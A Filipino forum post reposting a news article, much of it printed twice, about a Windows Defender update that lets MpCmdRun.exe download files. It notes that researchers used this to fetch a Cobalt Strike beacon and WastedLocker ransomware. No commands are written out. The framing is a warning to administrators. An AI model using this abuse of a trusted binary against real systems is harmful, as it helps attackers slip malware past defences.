PHPHC-kuyhaa_ratiborus
Elite
Share ko lang mga ka PHC to keep us informed. Although hindi sya malaking risk just in case gamitin ng perpetrator kc pwde ka nman mag Install ng Third Party Anti-Virus.
For those na nagsasabing enough na si Windows Defender, might as well reconsider.
This article is published by Paul Lilly & the new feature is discovered by Mohammad Askar (a security penetration tester and instructor who has posted hundreds of security articles)
Kindly read below or click the link to see the article.
Link :
You do not have permission to view the full content of this post. Log in or register now.
A recent update to Windows Defender gave it the ability to download files through a command line tool.
A recent update to the built-in antivirus software in Windows 10 has taught the program a new trick—how to download files through a command line tool, including nefarious ones (trojans, spyware, ransomware, and other malware).
Downloading malware is not the intended purpose, at least I presume that's not the case. But the new function could potentially be abused in such a manner. Fortunately, this is not something the typical home user needs to worry about, not unless they're a PC masochist (more on that in a moment).
This new ability was discovered by You do not have permission to view the full content of this post. Log in or register now. (via You do not have permission to view the full content of this post. Log in or register now.), a security penetration tester and instructor who has posted hundreds of security articles, according to his You do not have permission to view the full content of this post. Log in or register now..
"Well, you can download a file from the internet using Windows Defender itself. In this example, I was able to download Cobalt Strike beacon using the binary 'MpCmdRun.exe' which is the 'Microsoft Malware Protection Command Line'," Askar stated on Twitter.
This effectively allows a local attacker to leverage Defender as what is called a You do not have permission to view the full content of this post. Log in or register now. (LOLBin). That's when legitimate software is used for something malicious—in this case, using an antivirus program to download a virus.
It appears this new ability was added to Defender with the 4.18.2007.8 update in July, so the functionality has been there for nearly two months. Bleeping Computer tested the new download switch in the command line tool and was able to download the same WastedLocker ransomware that recently caused a ruckus with Garmin's infrastructure, which prompted the company to reportedly pay a multi-million dollar ransom.
This is not quite as careless as it may seem at first glance. For one, Defender will still scan files downloaded through this method, so in theory it should still protect against malware. And secondly, this would need to be initiated by a local user.
Nevertheless, this is something system administrators should be aware of, so they can take the proper precautions. It's not unheard of for a rogue employee to cause mischief, whether they are disgruntled, are on the verge of being fired, or any other reason.
-End-
For those na nagsasabing enough na si Windows Defender, might as well reconsider.
This article is published by Paul Lilly & the new feature is discovered by Mohammad Askar (a security penetration tester and instructor who has posted hundreds of security articles)
Kindly read below or click the link to see the article.
Link :
You do not have permission to view the full content of this post. Log in or register now.
A recent update to Windows Defender gave it the ability to download files through a command line tool.
A recent update to the built-in antivirus software in Windows 10 has taught the program a new trick—how to download files through a command line tool, including nefarious ones (trojans, spyware, ransomware, and other malware).
Downloading malware is not the intended purpose, at least I presume that's not the case. But the new function could potentially be abused in such a manner. Fortunately, this is not something the typical home user needs to worry about, not unless they're a PC masochist (more on that in a moment).
This new ability was discovered by You do not have permission to view the full content of this post. Log in or register now. (via You do not have permission to view the full content of this post. Log in or register now.), a security penetration tester and instructor who has posted hundreds of security articles, according to his You do not have permission to view the full content of this post. Log in or register now..
"Well, you can download a file from the internet using Windows Defender itself. In this example, I was able to download Cobalt Strike beacon using the binary 'MpCmdRun.exe' which is the 'Microsoft Malware Protection Command Line'," Askar stated on Twitter.
This effectively allows a local attacker to leverage Defender as what is called a You do not have permission to view the full content of this post. Log in or register now. (LOLBin). That's when legitimate software is used for something malicious—in this case, using an antivirus program to download a virus.
It appears this new ability was added to Defender with the 4.18.2007.8 update in July, so the functionality has been there for nearly two months. Bleeping Computer tested the new download switch in the command line tool and was able to download the same WastedLocker ransomware that recently caused a ruckus with Garmin's infrastructure, which prompted the company to reportedly pay a multi-million dollar ransom.
This is not quite as careless as it may seem at first glance. For one, Defender will still scan files downloaded through this method, so in theory it should still protect against malware. And secondly, this would need to be initiated by a local user.
Nevertheless, this is something system administrators should be aware of, so they can take the proper precautions. It's not unheard of for a rogue employee to cause mischief, whether they are disgruntled, are on the verge of being fired, or any other reason.
-End-
